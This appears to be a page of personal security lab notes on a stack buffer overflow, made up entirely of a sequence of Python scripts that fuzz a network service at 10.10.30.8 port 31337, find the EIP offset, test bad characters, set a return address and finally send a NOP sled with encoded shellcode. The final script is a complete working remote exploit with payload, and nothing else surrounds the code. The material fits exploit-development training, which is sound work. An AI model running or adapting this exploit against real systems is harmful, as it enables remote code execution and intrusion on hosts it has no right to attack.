dostackbufferoverflow

#!/usr/bin/python
import socket

try:
  print "\nSending evil buffer..."

  buffer = "A" * 400
 
  s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
  
  s.connect(("10.10.30.8", 31337))
  s.send(buffer + '\r\n')
  
  s.close()
  
  print "\nDone!"
  
except:
  print "\nCould not connect!"

#!/usr/bin/python
import socket

try:
  print "\nSending evil buffer..."

  buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A"
 
  s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
  
  s.connect(("10.10.30.8", 31337))
  s.send(buffer + '\r\n')
  
  s.close()
  
  print "\nDone!"
  
except:
  print "\nCould not connect!"

#!/usr/bin/python
import socket

try:
  print "\nSending evil buffer..."

  buffer = "A" * 146
  eip = "B" * 4
  offset = "C" * 1000
 
  s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
  
  s.connect(("10.10.30.8", 31337))
  s.send(buffer + eip + offset + '\r\n')
  
  s.close()
  
  print "\nDone!"
  
except:
  print "\nCould not connect!"

#!/usr/bin/python
import socket

try:
  print "\nSending evil buffer..."

  buffer = "A" * 146
  eip = "B" * 4
  #offset = "C" * 1000
 
  s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
  
  s.connect(("10.10.30.8", 31337))
  s.send(buffer + eip + '\r\n')
  
  s.close()
  
  print "\nDone!"
  
except:
  print "\nCould not connect!"

#!/usr/bin/python
import socket

try:
  print "\nSending evil buffer..."

  buffer = "A" * 146
  eip = "B" * 4
  badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
 
  s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
  
  s.connect(("10.10.30.8", 31337))
  s.send(buffer + eip + badchars + '\r\n')
  
  s.close()
  
  print "\nDone!"
  
except:
  print "\nCould not connect!"

#!/usr/bin/python
import socket

try:
  print "\nSending evil buffer..."

  buffer = "A" * 146
  #080414C3	080416BF
  eip = "\xC3\x14\x04\x08"
     
  s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
  
  s.connect(("10.10.30.8", 31337))
  s.send(buffer + eip + '\r\n')
  
  s.close()
  
  print "\nDone!"
  
except:
  print "\nCould not connect!"

#!/usr/bin/python
import socket

try:
  print "\nSending evil buffer..."

  buffer = "A" * 146
  #080414C3	080416BF
  eip = "\xC3\x14\x04\x08"
  nops = "\x90" * 10
  shellcode = ("\xbd\x64\xbf\x30\xa8\xdb\xc1\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x52\x83\xea\xfc\x31\x6a\x0e\x03\x0e\xb1\xd2\x5d\x32\x25\x90"
"\x9e\xca\xb6\xf5\x17\x2f\x87\x35\x43\x24\xb8\x85\x07\x68\x35"
"\x6d\x45\x98\xce\x03\x42\xaf\x67\xa9\xb4\x9e\x78\x82\x85\x81"
"\xfa\xd9\xd9\x61\xc2\x11\x2c\x60\x03\x4f\xdd\x30\xdc\x1b\x70"
"\xa4\x69\x51\x49\x4f\x21\x77\xc9\xac\xf2\x76\xf8\x63\x88\x20"
"\xda\x82\x5d\x59\x53\x9c\x82\x64\x2d\x17\x70\x12\xac\xf1\x48"
"\xdb\x03\x3c\x65\x2e\x5d\x79\x42\xd1\x28\x73\xb0\x6c\x2b\x40"
"\xca\xaa\xbe\x52\x6c\x38\x18\xbe\x8c\xed\xff\x35\x82\x5a\x8b"
"\x11\x87\x5d\x58\x2a\xb3\xd6\x5f\xfc\x35\xac\x7b\xd8\x1e\x76"
"\xe5\x79\xfb\xd9\x1a\x99\xa4\x86\xbe\xd2\x49\xd2\xb2\xb9\x05"
"\x17\xff\x41\xd6\x3f\x88\x32\xe4\xe0\x22\xdc\x44\x68\xed\x1b"
"\xaa\x43\x49\xb3\x55\x6c\xaa\x9a\x91\x38\xfa\xb4\x30\x41\x91"
"\x44\xbc\x94\x36\x14\x12\x47\xf7\xc4\xd2\x37\x9f\x0e\xdd\x68"
"\xbf\x31\x37\x01\x2a\xc8\xd0\x24\xa0\xdd\x06\x51\xb4\xe1\x46"
"\x94\x31\x07\x2c\xc6\x17\x90\xd9\x7f\x32\x6a\x7b\x7f\xe8\x17"
"\xbb\x0b\x1f\xe8\x72\xfc\x6a\xfa\xe3\x0c\x21\xa0\xa2\x13\x9f"
"\xcc\x29\x81\x44\x0c\x27\xba\xd2\x5b\x60\x0c\x2b\x09\x9c\x37"
"\x85\x2f\x5d\xa1\xee\xeb\xba\x12\xf0\xf2\x4f\x2e\xd6\xe4\x89"
"\xaf\x52\x50\x46\xe6\x0c\x0e\x20\x50\xff\xf8\xfa\x0f\xa9\x6c"
"\x7a\x7c\x6a\xea\x83\xa9\x1c\x12\x35\x04\x59\x2d\xfa\xc0\x6d"
"\x56\xe6\x70\x91\x8d\xa2\x91\x70\x07\xdf\x39\x2d\xc2\x62\x24"
"\xce\x39\xa0\x51\x4d\xcb\x59\xa6\x4d\xbe\x5c\xe2\xc9\x53\x2d"
"\x7b\xbc\x53\x82\x7c\x95")
   
  s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
  
  s.connect(("10.10.30.8", 31337))
  s.send(buffer + eip + nops + shellcode + '\r\n')
  
  s.close()
  
  print "\nDone!"
  
except:
  print "\nCould not connect!"

PreviousBuffer Overflow NextBoF 1

Last updated 4 years ago

Was this helpful?